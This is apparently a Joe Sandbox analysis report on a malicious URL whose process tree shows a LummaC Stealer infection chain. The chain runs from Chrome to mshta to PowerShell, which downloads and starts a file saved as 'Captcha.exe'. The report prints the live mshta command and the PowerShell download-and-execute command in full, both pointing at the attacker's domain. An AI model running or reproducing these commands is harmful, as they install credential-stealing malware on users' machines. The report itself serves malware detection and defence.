$D$R\|D$$$D$(D$.yuDtjM$D$-i(C_d;aHD$LL$PtP$D$D$6HhPD$D${D$L$T$D$D$L$wD$L$D$}D$ D$8D$L

Target ID:	1
Start time:	05:47:57
Start date:	07/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:48:00
Start date:	07/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2252,i,18259865782207701125,4781670294957568771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:48:06
Start date:	07/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:08:00
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta https://rea.grupolalegion.ec/p.php
Imagebase:	0xdd0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:08:04
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
Imagebase:	0xea0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:08:04
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:08:10
Start date:	07/03/2025
Path:	C:\ProgramData\Captcha.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Captcha.exe"
Imagebase:	0xf70000
File size:	2'142'592 bytes
MD5 hash:	05B7F29D1BAEAC0A7513D094BFC12A92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000002.2108416390.0000000001CBA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000002.2108523278.0000000001E66000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000003.1590701531.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	07:08:44
Start date:	07/03/2025
Path:	C:\ProgramData\Captcha.exe
Wow64 process (32bit):
Commandline:	none
Imagebase:
File size:	2'142'592 bytes
MD5 hash:	05B7F29D1BAEAC0A7513D094BFC12A92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://rea.grupolalegion.ec/p.php/1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

HTML

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Captcha.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\p[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5c3gxp.mgp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhk1cmkw.sfk.ps1

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Static File Info

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
https://rea.grupolalegion.ec/p.php/1